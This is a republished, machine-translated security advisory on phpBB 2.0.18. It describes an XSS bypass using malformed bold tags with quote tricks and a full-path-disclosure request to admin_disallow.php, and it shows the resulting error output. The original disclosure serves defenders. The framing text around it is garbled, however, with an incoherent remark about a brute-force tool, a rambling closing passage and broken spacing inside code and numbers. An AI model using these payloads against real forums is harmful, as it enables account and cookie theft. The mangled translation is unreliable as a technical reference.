phpBB Forum program:the old revolution met the new problem-the vulnerability warning-the black bar safety net

ID MYHACK58:6220055744
Type myhack58
Reporter 佚名
Modified 2005-12-24T00:00:00


phpBB 2.0.18 XSS and Full Path Disclosure

Details: SecurityAlert

There is a brute force tool, a single thread, there is no useful,it rivals had a what phpbb what also can be used to run the password

下载 : Topic : phpBB 2.0.18 XSS and Full Path Disclosure

| SecurityAlert Id : 2 6 9

SecurityRisk : Low

Remote Exploit : Yes

Local Exploit : No

Exploit Given : Yes

Credit : Maksymilian Arciemowicz

Date : 17.12.2005

Affected Software : phpBB <= 2.0.18

Advisory Text :


[phpBB 2.0.18 XSS and Full Path Disclosure cXIb8O3. 2 2]

Author: Maksymilian Arciemowicz (cXIb8O3) Date: 16.12.2005 from TEAM

\ - --- 0. Description --- phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin boar d package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL , MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community so lution for all web sites. Contact with the author

\ - --- 1. XSS --- If in phpbb is Allowed HTML tags "ON" like b,i,u,pre and have you in the profile "Always al low HTML: YES" or are you Guest

that you can use this tags:

<B C=">" X="<B "> H E L O </B>


<B C=">" X="<B "> H A L O </B>

and have you cookies.

\ - --- 2. Full Path Disclosure --- In file admin/admin_disallow.php is

\ - -25-31--- if( ! empty($setmodules) ) { $filename = basename(FILE); $module[’Users’][’Disallow’] = append_sid($filename);

return; } \ - -25-31---

function append_sid() dosen't exists. And if you have:

register_globals = On display_errors = On

Try to g http://[HOST]/[DIR]/admin/admin_disallow. php? setmodules=1

- -RESULT ERROR--- Fatal error: Call to undefined function: append_sid() in /www/2 0 1 8/phpBB2/admin/admin_disa llow.php on line 2 8 - -RESULT ERROR---

\ - --- 3. Greets --- sp3x

\ - --- 4. Contact --- Author: Maksymilian Arciemowicz < cXIb8O3 > Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com GPG: TEAM ----- BEGIN PGP SIGNATURE----- Version: GnuPG v1. 4. 2 (FreeBSD)

iD8DBQFDpDtC3Ke13X/fTO4RAosCAJkBcYRNbHKDGeuwnY1U/WXMhzDnVQCgl39D /0u14EN2sQAh1Bwu0yvT48Q= =lsL8 ----- END PGP SIGNATURE-----

Oh,by the way, the top that seems maybe probably seem to I guess is this meaning:

Personality signature: You fill out a personalized signature automatically included in your post at the bottom. Personalized signature 5 1 2 character limit.

Prohibited HTML tags Allow the style tag Allow emoticons

Find“allow HTML tags”